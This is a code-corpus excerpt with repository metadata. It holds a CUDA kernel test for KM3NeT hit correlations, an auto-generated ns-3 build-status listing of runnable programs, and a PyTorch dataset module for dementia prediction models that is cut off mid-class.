    widest floor (``2*n_floors - 1`` characters) by space padding.
    """
    width = 2 * n_floors - 1
    return [('*' * (2 * floor + 1)).center(width) for floor in range(n_floors)]
| 16.842105 | 69 | 0.553125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.24375 |
441af981b78ee749fe1c18e5c8769744f42b1cf0 | 1,745 | py | Python | test/test_degrees_kernel.py | remenska/KM3Net | 4c175662465b9a880fc1864f62219ce9702311f1 | [
"Apache-2.0"
] | 1 | 2022-01-23T23:54:08.000Z | 2022-01-23T23:54:08.000Z | test/test_degrees_kernel.py | nlesc-km3net/KM3NeT | 4c175662465b9a880fc1864f62219ce9702311f1 | [
"Apache-2.0"
] | 2 | 2016-07-01T12:19:15.000Z | 2016-07-04T09:01:51.000Z | test/test_degrees_kernel.py | nlesc-km3net/KM3NeT | 4c175662465b9a880fc1864f62219ce9702311f1 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import numpy as np
from kernel_tuner import run_kernel
from .context import skip_if_no_cuda_device, create_plot
from km3net.util import get_kernel_path, generate_correlations_table
def test_degrees_kernel():
    """Compare the degrees_dense CUDA kernel against a host reference."""
    skip_if_no_cuda_device()

    def in_degrees(correlations):
        # Host reference: in-degree of node i is the sum over rows j of
        # correlations[j, i - j - 1] (for valid column indices only).
        num_rows, num_cols = correlations.shape
        degrees = np.zeros(num_cols)
        for node in range(num_cols):
            total = 0
            for row in range(num_rows):
                col = node - row - 1
                if col >= 0:
                    total += correlations[row, col]
            degrees[node] = total
        return degrees

    with open(get_kernel_path() + 'degrees.cu', 'r') as f:
        kernel_string = f.read()

    N = np.int32(400)
    sliding_window_width = np.int32(150)
    problem_size = (N, 1)

    # generate input data with an expected density of correlated hits
    correlations = generate_correlations_table(N, sliding_window_width, cutoff=2.87)

    # compute reference answer
    out_degree = np.sum(correlations, axis=0).astype(np.int32)
    reference = in_degrees(correlations) + out_degree

    # call the CUDA kernel
    args = [out_degree, correlations, N]
    params = {"block_size_x": 256, 'window_width': sliding_window_width}
    answer = run_kernel("degrees_dense", kernel_string, problem_size, args, params)
    print("answer", answer[0])
    print("reference", reference)

    # verify
    test_result = np.sum(answer[0] - reference) == 0
    if not test_result:
        print("test degrees_dense FAILED, attempting to create a plot for visual comparison")
        create_plot(reference.reshape(20, 20), answer[0].reshape(20, 20))
    assert test_result
| 32.924528 | 93 | 0.67851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 272 | 0.155874 |
441cc1fcbf285eb769a00c3f77129f03547305f0 | 12,718 | py | Python | ns-allinone-3.27/ns-3.27/build/build-status.py | zack-braun/4607_NS | 43c8fb772e5552fb44bd7cd34173e73e3fb66537 | [
"MIT"
] | null | null | null | ns-allinone-3.27/ns-3.27/build/build-status.py | zack-braun/4607_NS | 43c8fb772e5552fb44bd7cd34173e73e3fb66537 | [
"MIT"
] | null | null | null | ns-allinone-3.27/ns-3.27/build/build-status.py | zack-braun/4607_NS | 43c8fb772e5552fb44bd7cd34173e73e3fb66537 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# Programs that are runnable.
ns3_runnable_programs = ['build/src/aodv/examples/ns3.27-aodv-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-one-hop-debug', 'build/src/buildings/examples/ns3.27-buildings-pathloss-profiler-debug', 'build/src/config-store/examples/ns3.27-config-store-save-debug', 'build/src/core/examples/ns3.27-main-callback-debug', 'build/src/core/examples/ns3.27-sample-simulator-debug', 'build/src/core/examples/ns3.27-main-ptr-debug', 'build/src/core/examples/ns3.27-main-random-variable-debug', 'build/src/core/examples/ns3.27-main-random-variable-stream-debug', 'build/src/core/examples/ns3.27-sample-random-variable-debug', 'build/src/core/examples/ns3.27-sample-random-variable-stream-debug', 'build/src/core/examples/ns3.27-command-line-example-debug', 'build/src/core/examples/ns3.27-hash-example-debug', 'build/src/core/examples/ns3.27-sample-log-time-format-debug', 'build/src/core/examples/ns3.27-test-string-value-formatting-debug', 'build/src/csma/examples/ns3.27-csma-one-subnet-debug', 'build/src/csma/examples/ns3.27-csma-broadcast-debug', 'build/src/csma/examples/ns3.27-csma-packet-socket-debug', 'build/src/csma/examples/ns3.27-csma-multicast-debug', 'build/src/csma/examples/ns3.27-csma-raw-ip-socket-debug', 'build/src/csma/examples/ns3.27-csma-ping-debug', 'build/src/csma-layout/examples/ns3.27-csma-star-debug', 'build/src/dsdv/examples/ns3.27-dsdv-manet-debug', 'build/src/dsr/examples/ns3.27-dsr-debug', 'build/src/energy/examples/ns3.27-li-ion-energy-source-debug', 'build/src/energy/examples/ns3.27-rv-battery-model-test-debug', 'build/src/energy/examples/ns3.27-basic-energy-model-test-debug', 'build/src/fd-net-device/examples/ns3.27-dummy-network-debug', 'build/src/fd-net-device/examples/ns3.27-fd2fd-onoff-debug', 'build/src/internet/examples/ns3.27-main-simple-debug', 'build/src/internet-apps/examples/ns3.27-dhcp-example-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-packet-print-debug', 
'build/src/lr-wpan/examples/ns3.27-lr-wpan-phy-test-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-data-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-model-plot-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-distance-plot-debug', 'build/src/lte/examples/ns3.27-lena-cqi-threshold-debug', 'build/src/lte/examples/ns3.27-lena-dual-stripe-debug', 'build/src/lte/examples/ns3.27-lena-fading-debug', 'build/src/lte/examples/ns3.27-lena-intercell-interference-debug', 'build/src/lte/examples/ns3.27-lena-pathloss-traces-debug', 'build/src/lte/examples/ns3.27-lena-profiling-debug', 'build/src/lte/examples/ns3.27-lena-rem-debug', 'build/src/lte/examples/ns3.27-lena-rem-sector-antenna-debug', 'build/src/lte/examples/ns3.27-lena-rlc-traces-debug', 'build/src/lte/examples/ns3.27-lena-simple-debug', 'build/src/lte/examples/ns3.27-lena-simple-epc-debug', 'build/src/lte/examples/ns3.27-lena-deactivate-bearer-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-measures-debug', 'build/src/lte/examples/ns3.27-lena-frequency-reuse-debug', 'build/src/lte/examples/ns3.27-lena-distributed-ffr-debug', 'build/src/lte/examples/ns3.27-lena-uplink-power-control-debug', 'build/src/mesh/examples/ns3.27-mesh-debug', 'build/src/mobility/examples/ns3.27-main-grid-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-walk-debug', 'build/src/mobility/examples/ns3.27-mobility-trace-example-debug', 'build/src/mobility/examples/ns3.27-ns2-mobility-trace-debug', 'build/src/mobility/examples/ns3.27-bonnmotion-ns2-example-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-debug', 'build/src/mpi/examples/ns3.27-third-distributed-debug', 'build/src/mpi/examples/ns3.27-nms-p2p-nix-distributed-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-empty-node-debug', 'build/src/netanim/examples/ns3.27-dumbbell-animation-debug', 
'build/src/netanim/examples/ns3.27-grid-animation-debug', 'build/src/netanim/examples/ns3.27-star-animation-debug', 'build/src/netanim/examples/ns3.27-wireless-animation-debug', 'build/src/netanim/examples/ns3.27-uan-animation-debug', 'build/src/netanim/examples/ns3.27-colors-link-description-debug', 'build/src/netanim/examples/ns3.27-resources-counters-debug', 'build/src/network/examples/ns3.27-main-packet-header-debug', 'build/src/network/examples/ns3.27-main-packet-tag-debug', 'build/src/network/examples/ns3.27-packet-socket-apps-debug', 'build/src/nix-vector-routing/examples/ns3.27-nix-simple-debug', 'build/src/nix-vector-routing/examples/ns3.27-nms-p2p-nix-debug', 'build/src/olsr/examples/ns3.27-simple-point-to-point-olsr-debug', 'build/src/olsr/examples/ns3.27-olsr-hna-debug', 'build/src/point-to-point/examples/ns3.27-main-attribute-value-debug', 'build/src/propagation/examples/ns3.27-main-propagation-loss-debug', 'build/src/propagation/examples/ns3.27-jakes-propagation-model-example-debug', 'build/src/sixlowpan/examples/ns3.27-example-sixlowpan-debug', 'build/src/sixlowpan/examples/ns3.27-example-ping-lr-wpan-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-matrix-propagation-loss-model-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-with-microwave-oven-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-example-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-regional-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-example-debug', 'build/src/stats/examples/ns3.27-double-probe-example-debug', 'build/src/stats/examples/ns3.27-time-probe-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-aggregator-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-helper-example-debug', 'build/src/stats/examples/ns3.27-file-aggregator-example-debug', 'build/src/stats/examples/ns3.27-file-helper-example-debug', 
'build/src/topology-read/examples/ns3.27-topology-example-sim-debug', 'build/src/traffic-control/examples/ns3.27-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-red-vs-ared-debug', 'build/src/traffic-control/examples/ns3.27-adaptive-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-pfifo-vs-red-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-basic-test-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-asymmetric-debug', 'build/src/traffic-control/examples/ns3.27-pie-example-debug', 'build/src/uan/examples/ns3.27-uan-cw-example-debug', 'build/src/uan/examples/ns3.27-uan-rc-example-debug', 'build/src/virtual-net-device/examples/ns3.27-virtual-net-device-debug', 'build/src/wave/examples/ns3.27-wave-simple-80211p-debug', 'build/src/wave/examples/ns3.27-wave-simple-device-debug', 'build/src/wave/examples/ns3.27-vanet-routing-compare-debug', 'build/src/wifi/examples/ns3.27-wifi-phy-test-debug', 'build/src/wifi/examples/ns3.27-test-interference-helper-debug', 'build/src/wifi/examples/ns3.27-wifi-manager-example-debug', 'build/src/wimax/examples/ns3.27-wimax-ipv4-debug', 'build/src/wimax/examples/ns3.27-wimax-multicast-debug', 'build/src/wimax/examples/ns3.27-wimax-simple-debug', 'build/examples/energy/ns3.27-energy-model-example-debug', 'build/examples/energy/ns3.27-energy-model-with-harvesting-example-debug', 'build/examples/error-model/ns3.27-simple-error-model-debug', 'build/examples/ipv6/ns3.27-icmpv6-redirect-debug', 'build/examples/ipv6/ns3.27-ping6-debug', 'build/examples/ipv6/ns3.27-radvd-debug', 'build/examples/ipv6/ns3.27-radvd-two-prefix-debug', 'build/examples/ipv6/ns3.27-test-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-two-MTU-debug', 'build/examples/ipv6/ns3.27-loose-routing-ipv6-debug', 'build/examples/ipv6/ns3.27-wsn-ping6-debug', 'build/examples/matrix-topology/ns3.27-matrix-topology-debug', 
'build/examples/naming/ns3.27-object-names-debug', 'build/examples/routing/ns3.27-dynamic-global-routing-debug', 'build/examples/routing/ns3.27-static-routing-slash32-debug', 'build/examples/routing/ns3.27-global-routing-slash32-debug', 'build/examples/routing/ns3.27-global-injection-slash32-debug', 'build/examples/routing/ns3.27-simple-global-routing-debug', 'build/examples/routing/ns3.27-simple-alternate-routing-debug', 'build/examples/routing/ns3.27-mixed-global-routing-debug', 'build/examples/routing/ns3.27-simple-routing-ping6-debug', 'build/examples/routing/ns3.27-manet-routing-compare-debug', 'build/examples/routing/ns3.27-ripng-simple-network-debug', 'build/examples/routing/ns3.27-rip-simple-network-debug', 'build/examples/routing/ns3.27-global-routing-multi-switch-plus-router-debug', 'build/examples/socket/ns3.27-socket-bound-static-routing-debug', 'build/examples/socket/ns3.27-socket-bound-tcp-static-routing-debug', 'build/examples/socket/ns3.27-socket-options-ipv4-debug', 'build/examples/socket/ns3.27-socket-options-ipv6-debug', 'build/examples/stats/ns3.27-wifi-example-sim-debug', 'build/examples/tcp/ns3.27-tcp-large-transfer-debug', 'build/examples/tcp/ns3.27-tcp-nsc-lfn-debug', 'build/examples/tcp/ns3.27-tcp-nsc-zoo-debug', 'build/examples/tcp/ns3.27-tcp-star-server-debug', 'build/examples/tcp/ns3.27-star-debug', 'build/examples/tcp/ns3.27-tcp-bulk-send-debug', 'build/examples/tcp/ns3.27-tcp-pcap-nanosec-example-debug', 'build/examples/tcp/ns3.27-tcp-nsc-comparison-debug', 'build/examples/tcp/ns3.27-tcp-variants-comparison-debug', 'build/examples/traffic-control/ns3.27-traffic-control-debug', 'build/examples/traffic-control/ns3.27-queue-discs-benchmark-debug', 'build/examples/traffic-control/ns3.27-red-vs-fengadaptive-debug', 'build/examples/traffic-control/ns3.27-red-vs-nlred-debug', 'build/examples/tutorial/ns3.27-hello-simulator-debug', 'build/examples/tutorial/ns3.27-first-debug', 'build/examples/tutorial/ns3.27-second-debug', 
'build/examples/tutorial/ns3.27-third-debug', 'build/examples/tutorial/ns3.27-fourth-debug', 'build/examples/tutorial/ns3.27-fifth-debug', 'build/examples/tutorial/ns3.27-sixth-debug', 'build/examples/tutorial/ns3.27-seventh-debug', 'build/examples/udp/ns3.27-udp-echo-debug', 'build/examples/udp-client-server/ns3.27-udp-client-server-debug', 'build/examples/udp-client-server/ns3.27-udp-trace-client-server-debug', 'build/examples/wireless/ns3.27-mixed-wired-wireless-debug', 'build/examples/wireless/ns3.27-wifi-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-clear-channel-cmu-debug', 'build/examples/wireless/ns3.27-wifi-ap-debug', 'build/examples/wireless/ns3.27-wifi-wired-bridging-debug', 'build/examples/wireless/ns3.27-multirate-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-grid-debug', 'build/examples/wireless/ns3.27-wifi-simple-infra-debug', 'build/examples/wireless/ns3.27-wifi-simple-interference-debug', 'build/examples/wireless/ns3.27-wifi-blockack-debug', 'build/examples/wireless/ns3.27-ofdm-validation-debug', 'build/examples/wireless/ns3.27-ofdm-ht-validation-debug', 'build/examples/wireless/ns3.27-ofdm-vht-validation-debug', 'build/examples/wireless/ns3.27-wifi-hidden-terminal-debug', 'build/examples/wireless/ns3.27-ht-wifi-network-debug', 'build/examples/wireless/ns3.27-vht-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-timing-attributes-debug', 'build/examples/wireless/ns3.27-wifi-sleep-debug', 'build/examples/wireless/ns3.27-power-adaptation-distance-debug', 'build/examples/wireless/ns3.27-power-adaptation-interference-debug', 'build/examples/wireless/ns3.27-rate-adaptation-distance-debug', 'build/examples/wireless/ns3.27-wifi-aggregation-debug', 'build/examples/wireless/ns3.27-simple-ht-hidden-stations-debug', 'build/examples/wireless/ns3.27-80211n-mimo-debug', 'build/examples/wireless/ns3.27-mixed-network-debug', 'build/examples/wireless/ns3.27-wifi-tcp-debug', 
'build/examples/wireless/ns3.27-80211e-txop-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-example-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-interference-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-saturation-example-debug', 'build/examples/wireless/ns3.27-ofdm-he-validation-debug', 'build/examples/wireless/ns3.27-he-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-multi-tos-debug', 'build/examples/wireless/ns3.27-wifi-backward-compatibility-debug', 'build/scratch/ns3.27-scratch-simulator-debug', 'build/scratch/subdir/ns3.27-subdir-debug']
# Scripts that are runnable.
# NOTE(review): this file appears to be auto-generated by the ns-3 build
# (it lives under build/ and lists built targets) -- do not edit by hand;
# confirm it is regenerated by waf on each build.
ns3_runnable_scripts = ['csma-bridge.py', 'sample-simulator.py', 'wifi-olsr-flowmon.py', 'simple-routing-ping6.py', 'first.py', 'second.py', 'third.py', 'mixed-wired-wireless.py', 'wifi-ap.py']
| 1,413.111111 | 12,438 | 0.787231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12,229 | 0.961551 |
441d1598d9cc31eb5ebaa68b12f30240e2830d64 | 16,473 | py | Python | datasets.py | mi-erasmusmc/Sard | d8228a7c49e2e6f98fbd16d4531cb3fc4b505590 | [
"MIT"
] | null | null | null | datasets.py | mi-erasmusmc/Sard | d8228a7c49e2e6f98fbd16d4531cb3fc4b505590 | [
"MIT"
] | null | null | null | datasets.py | mi-erasmusmc/Sard | d8228a7c49e2e6f98fbd16d4531cb3fc4b505590 | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn.functional as F
from scipy.sparse import coo_matrix
from sklearn.preprocessing import StandardScaler
from torch.utils.data import Dataset
from torch_geometric.data import InMemoryDataset, Data, Batch
from tqdm.auto import tqdm
from utils.data_utils import window_data_sorted, add_age_gender
class GraphDataset(InMemoryDataset):
    """
    Dataset to use for graph neural networks.

    Each patient becomes one fully connected graph whose nodes are the
    patient's (windowed, binarized) feature ids, plus one extra node that
    can serve as a classification read-out (see ``process_patient``).
    """
    def __init__(self, root='/data/home/efridgeirsson/projects/dementia/data/sequence_dementia'):
        # InMemoryDataset runs process() during __init__ if the processed
        # file does not exist yet, so the load below is safe afterwards.
        super(GraphDataset, self).__init__(root)
        self.data, self.slices = torch.load(self.processed_paths[0])
        self.labels = self.data.y
    @property
    def num_features(self):
        # Number of distinct node ids seen across the collated graphs.
        return len(self.data.x.unique())
    @property
    def raw_file_names(self):
        return ['python_data']
    @property
    def processed_file_names(self):
        return ['dementia.dataset']
    def download(self):
        # Raw data is expected to be present locally; nothing to download.
        pass
    def process(self):
        """Build the per-patient graphs from the raw tensors and save them."""
        data = torch.load(self.raw_paths[0])
        old_covariate_ids = data['map'].oldCovariateId
        covariate_ref = data['covariateRef']
        feature_names = covariate_ref[covariate_ref.covariateId.isin(old_covariate_ids)].covariateName.values
        # Look-back window lengths used to bucket the temporal features
        # (presumably days -- TODO confirm against window_data_sorted).
        window_lengths = (30, 180, 365)
        feature_matrix_counts, windowed_feature_names = window_data_sorted(
            window_lengths=list(window_lengths),
            feature_matrix=data['data'].coalesce(),
            all_feature_names=feature_names)
        feature_matrix_counts = feature_matrix_counts.T
        feature_matrix_counts.data = np.clip(feature_matrix_counts.data, 0, 1) # counts to binary
        feature_matrix_counts, windowed_feature_names = add_age_gender(feature_matrix_counts,
                                                                       data['nonTemporalData'],
                                                                       windowed_feature_names,
                                                                       age_normalized=False)
        # Rows with a non-negative 'index' form the train split; the rest test.
        train_index = data['population'][data['population']['index'] >= 0].index.values
        test_index = data['population'][data['population']['index'] < 0.0].index.values
        # The last 4 columns are the demographics appended by add_age_gender
        # (presumably age terms + gender -- TODO confirm in data_utils).
        encounter_data = feature_matrix_counts[:, :-4]
        demographic_data = feature_matrix_counts[:, -4:].toarray()
        # Standardize the continuous demographic columns (all but the last)
        # using train-split statistics only, to avoid leakage into test.
        scaler = StandardScaler()
        demographic_data[train_index, :-1] = scaler.fit_transform(demographic_data[train_index, :-1])
        demographic_data[test_index, :-1] = scaler.transform(demographic_data[test_index, :-1])
        outcomes = torch.as_tensor(data['population'].outcomeCount.values, dtype=torch.float32)
        demographic_data = torch.as_tensor(demographic_data, dtype=torch.float32)
        patients = [p for p in range(encounter_data.shape[0])]
        data_list = self.process_patient(patients, demographic_data, encounter_data, outcomes)
        data, slices = self.collate(data_list)
        torch.save((data, slices), self.processed_paths[0])
    @staticmethod
    def process_patient(patient_idxs, demographic_data=None, encounter_data=None, outcomes=None):
        """Create one fully connected ``Data`` graph per patient index."""
        data = []
        for patient_idx in tqdm(patient_idxs):
            patient_data = encounter_data[patient_idx, :].toarray()
            # Node ids = column indices of the patient's nonzero features.
            source_nodes = torch.as_tensor(patient_data.nonzero()[1], dtype=torch.long)
            num_nodes = len(source_nodes)
            source_nodes = source_nodes[None, :]
            normalized_source_nodes = torch.as_tensor((range(len(source_nodes.unique()))))
            # Dense all-pairs edge index over the patient's nodes.
            edge_index = torch.cat((normalized_source_nodes.repeat(1, num_nodes),
                                    normalized_source_nodes.repeat(num_nodes, 1).transpose(0, 1).contiguous().view(
                                        (1, num_nodes ** 2))), dim=0)
            # add extra node for classification
            # (id = number of feature columns, i.e. one past the last feature)
            output_nodes = torch.cat((source_nodes[0, :], torch.as_tensor([patient_data.shape[1]])))
            output_nodes = output_nodes[None, :]
            normalized_output_nodes = torch.as_tensor((range(len(output_nodes.unique()))))
            output_edge_index = torch.cat((normalized_output_nodes.repeat(1, num_nodes + 1),
                                           normalized_output_nodes.repeat(num_nodes + 1, 1).transpose(0,
                                                                                                      1).contiguous().view(
                                               (1, (num_nodes + 1) ** 2))), dim=0)
            dem_data = demographic_data[patient_idx, :]
            y = outcomes[patient_idx]
            data.append(Data(x=output_nodes.transpose(0, 1), edge_index=edge_index.long(),
                             output_edge_index=output_edge_index.long(), y=y,
                             demographic=dem_data[None, :]))
        return data
def graph_collate(batch):
    """Collate a list of ``Data`` objects into a single ``Batch``.

    Returns the merged batch together with its label tensor. If the first
    element is not a ``Data`` instance nothing is returned (implicitly
    ``None``), matching the original behavior.
    """
    if isinstance(batch[0], Data):
        merged = Batch.from_data_list(batch)
        return merged, merged.y
class SARDData(Dataset):
    """
    Dataset class used for the original SARD implementation.

    Serves (patient index, numeric covariates) pairs together with the
    outcome label and, in distillation mode, the predictions of a
    previously fitted model.
    """
    def __init__(self, indices, non_temporal, train_indices, outcomes, linear_predictions=None,
                 distill=True):
        """
        Parameters
        ----------
        indices : array-like of patient row ids served by this dataset
            (indexed positionally in ``__getitem__``)
        non_temporal : dataframe in long format with columns rowIdPython,
            covariateId and covariateValue
        train_indices : row ids used to fit the age scaler (train split
            only, so no statistics leak from validation/test)
        outcomes : outcome labels
        linear_predictions : predictions from previous model to distill
        distill : if run for distillation or not, if distillation then get_item returns also predictions
            of already fit model
        """
        self.distill = distill
        self.outcomes = outcomes
        self.linear_predictions = linear_predictions
        self.indices = indices
        # fix r to py (R row ids are 1-based, python is 0-based)
        non_temporal.rowIdPython = non_temporal.rowIdPython - 1
        # extract age and other covariates
        age_id = 1002  # covariateId of the age covariate -- TODO confirm
        age_df = non_temporal[non_temporal.covariateId == age_id]
        age_df = age_df.sort_values(by='rowIdPython')
        age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
        # Expand age into three basis terms: age, age^2 and sqrt(age).
        age_squared = age ** 2
        age_sqrt = torch.sqrt(age)
        ages = torch.stack([age, age_squared, age_sqrt]).T
        scaler = StandardScaler()
        scaler.fit(ages[train_indices])
        # Bugfix: StandardScaler.transform returns a numpy ndarray, which the
        # torch.cat below cannot consume (it requires a sequence of Tensors);
        # convert the scaled values back to a float32 tensor.
        ages = torch.as_tensor(scaler.transform(ages), dtype=torch.float32)
        # other covariates: scatter their values into a dense column aligned
        # with the row ids; rows without a value stay 0.
        other_df = non_temporal[non_temporal.covariateId != age_id].sort_values(by='rowIdPython')
        not_age = torch.zeros((len(ages)))
        not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
        self.num = torch.cat([ages, not_age[:, None]], dim=1)
    def __len__(self):
        return len(self.indices)
    def __getitem__(self, item):
        # Returns ((patient id, numeric covariates), target); in distill
        # mode the target is a (label, teacher prediction) pair.
        if self.distill:
            return (self.indices[item], self.num[item]), (
                self.outcomes[self.indices[item]], self.linear_predictions[self.indices[item]])
        else:
            return (self.indices[item], self.num[item]), self.outcomes[self.indices[item]]
class VisitSequenceWithLabelDataset(Dataset):
    """
    Dataset class that uses lists of lists
    """
    def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=False):
        """
        Args:
            seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
            labels (list): list of labels (int)
            num_features (int): number of total features available
            non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
            visits (list): list of patients with timeId of visits
            train_indices (): indices of training set, used for operations that should only use info from training set
            reverse (bool): If true, reverse the order of sequence (for RETAIN)
        """
        if len(seqs) != len(labels):
            raise ValueError("Sequences and Labels have different lengths")
        # fix r to py (R row ids are 1-based)
        non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
        # extract age and other covariates
        age_id = 1002
        age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
        age_df = age_df.sort_values(by='rowIdPython')
        age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
        age_squared = age ** 2
        age_sqrt = torch.sqrt(age)
        # Three derived age features: age, age^2 and sqrt(age).
        ages = torch.stack([age, age_squared, age_sqrt]).T
        # Standardize ages; scaler fit on training rows only to avoid leakage.
        scaler = StandardScaler()
        scaler.fit(ages[train_indices])
        ages = torch.as_tensor(scaler.transform(ages), dtype=torch.float32)
        # other covariates (non-age), scattered into a dense per-patient value
        other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
        not_age = torch.zeros((len(seqs)))
        not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
        self.train_indices = train_indices
        self.num = torch.cat([ages, not_age[:, None]], dim=1)
        # Cap the number of visits at the 99th percentile over all patients.
        n_visits = [len(v) for v in visits]
        self.max_visits = np.percentile(n_visits, 99).astype(int)
        self.num_features = num_features
        # Pad visit-time ids to max_visits per patient. NOTE(review): for
        # patients with more than max_visits visits the pad amount is
        # negative, which truncates the sequence — confirm this is intended.
        self.visits = torch.vstack(
            [F.pad(torch.as_tensor(v, dtype=torch.long), (0, self.max_visits - len(v))) for v in visits])
        self.seqs = []
        self.lengths = []
        # Build one sparse (max_visits x num_features) indicator matrix per
        # patient; codes >= num_features are silently dropped.
        for i, (seq, label) in tqdm(enumerate(zip(seqs, labels))):
            if reverse:
                sequence = list(reversed(seq))
            else:
                sequence = seq
            row = []
            col = []
            val = []
            for j, visit in enumerate(sequence):
                for code in visit:
                    if code < num_features:
                        row.append(j)
                        col.append(code)
                        val.append(1.0)
            if len(sequence) < self.max_visits:
                self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
                                            shape=(self.max_visits, num_features)))
                self.lengths.append(len(sequence))
            else:
                ix = np.array(row) < self.max_visits  # truncate to max visits
                self.seqs.append(
                    coo_matrix((np.array(val, dtype=np.float32)[ix], (np.array(row)[ix], np.array(col)[ix])),
                               shape=(self.max_visits, num_features)))
                self.lengths.append(self.max_visits)
        self.labels = torch.as_tensor(labels, dtype=torch.float32)

    def __len__(self):
        return len(self.labels)

    def __getitem__(self, index):
        # Returns (dense visit matrix, numeric covariates, label, true
        # sequence length, visit-time ids).
        return torch.as_tensor(self.seqs[index].todense()), self.num[index, ...], self.labels[index], \
               self.lengths[index], self.visits[index]
class DistillDataset(VisitSequenceWithLabelDataset):
    """
    Dataset for knowledge distillation: extends the base visit-sequence
    dataset so that each item can also carry the teacher model's prediction.
    """
    def __init__(self, linear_predictions=None, distill=True, **kwargs):
        super().__init__(**kwargs)
        self.distill = distill
        self.linear_predictions = torch.as_tensor(linear_predictions.values, dtype=torch.float32)

    def __len__(self):
        return len(self.labels)

    def __getitem__(self, index):
        dense_seq = torch.as_tensor(self.seqs[index].todense())
        head = (dense_seq, self.num[index, ...])
        tail = (self.labels[index], self.lengths[index], self.visits[index])
        if self.distill:
            # Insert the teacher prediction between covariates and label.
            return head + (self.linear_predictions[index],) + tail
        return head + tail
class RETAIN_dataset(Dataset):
    """
    RETAIN is an RNN and so doesn't need to pad the input but can work with variable length sequences so I used
    this class that doesn't pad the input.
    """
    def __init__(self, seqs, labels, num_features, non_temporal_data, visits, train_indices, reverse=True):
        """
        Args:
            seqs (list): list of patients (list) of visits (list) of codes (int) that contains visit sequences
            labels (list): list of labels (int)
            num_features (int): number of total features available
            non_temporal_data (dataframe): dataframe with nonTemporalData such as age or gender.
            visits (list): list of patients with timeId of visits
            train_indices (): indices of training set, used for operations that should only use info from training set
            reverse (bool): If true, reverse the order of sequence (for RETAIN)
        """
        if len(seqs) != len(labels):
            raise ValueError("Sequences and Labels have different lengths")
        # fix r to py (R row ids are 1-based)
        non_temporal_data.rowIdPython = non_temporal_data.rowIdPython - 1
        # extract age and other covariates
        age_id = 1002
        age_df = non_temporal_data[non_temporal_data.covariateId == age_id]
        age_df = age_df.sort_values(by='rowIdPython')
        age = torch.as_tensor(age_df.covariateValue.values, dtype=torch.float32)
        age_squared = age ** 2
        age_sqrt = torch.sqrt(age)
        # Three derived age features: age, age^2 and sqrt(age).
        ages = torch.stack([age, age_squared, age_sqrt]).T
        # Normalize by the training-set maxima (not a StandardScaler here,
        # unlike the other dataset classes).
        age_maxes = torch.max(ages[train_indices], dim=0).values
        ages = ages / age_maxes
        # other covariates (non-age), scattered into a dense per-patient value
        other_df = non_temporal_data[non_temporal_data.covariateId != age_id].sort_values(by='rowIdPython')
        not_age = torch.zeros((len(seqs)))
        not_age[other_df.rowIdPython.values] = torch.as_tensor(other_df.covariateValue.values, dtype=torch.float32)
        self.num = torch.cat([ages, not_age[:, None]], dim=1)
        self.visits = visits
        self.seqs = []
        self.lengths = []
        # Build one variable-length sparse (n_visits x num_features)
        # indicator matrix per patient; codes >= num_features are dropped.
        # NOTE: ``label`` from the zip is unused in the loop body.
        for i, (seq, label) in enumerate(zip(seqs, labels)):
            if reverse:
                sequence = list(reversed(seq))
            else:
                sequence = seq
            row = []
            col = []
            val = []
            for j, visit in enumerate(sequence):
                for code in visit:
                    if code < num_features:
                        row.append(j)
                        col.append(code)
                        val.append(1.0)
            self.seqs.append(coo_matrix((np.array(val, dtype=np.float32), (np.array(row), np.array(col))),
                                        shape=(len(sequence), num_features)))
